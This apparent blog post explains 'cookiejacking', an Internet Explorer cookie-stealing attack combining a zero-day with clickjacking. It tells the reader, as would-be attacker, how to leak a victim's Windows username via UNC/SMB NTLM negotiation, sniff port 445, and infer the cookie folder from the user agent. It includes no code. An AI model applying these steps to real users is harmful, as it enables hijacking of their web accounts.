You know about clickjacking which is mostly used in facebook to hijack user's click. Cookiejack is little different concept.Cookiejacking is a UI redressing attack that allows an attacker to hijack his victim's cookies without any XSS. It works on
- Any cookie.
- Any website.
Once a hacker has that cookie, he or she can use it to access the same site. So we can say that facebook, twitter, Gmail and many more websites are at risk.
A computer security researcher has found a flaw in Microsoft Corp's widely used Internet Explorer browser that he said could let hackers steal credentials to access FaceBook, Twitter and other websites.
Cookiejacking leverages on two main issues to perform attack
- a 0-day vulnerability affecting every IE version on every Windows OS box
- an advanced Clickjacking approach.
It seems too difficult but Valotta, the researcher said that he was able to do it fairly easily. He built a puzzle that he put up on Facebook in which users are challenged to "undress" a photo of an attractive woman. he published this game online on FaceBook and in less than three days, more than 80 cookies were sent to his server.
But you need to know some facts before performing this attack. First of all, cookies file system path depends on Windows username, so you need to guess your victim's username before starting the attack.
You can sniff your victim's username by exploiting a feature of IE: by using IE you can access remote SMB resources using UNC paths to reference them. You can do this without restriction in Internet and Intranet zones.
So, if you force your victim's browser to retrieve a resource like it will start a NTLM challenge-response negotiation with the remote server and, as a part of this negotiation, it sends Windows Username in clear plain text.
So you can just use a script to sniff data on TCP port 445 in order to grab the username. You also need to know which OS version is the victim running, as different OSs store cookies in different folders. But you can guess this by parsing the navigator.userAgent object.
See demo video
Would love to here from you...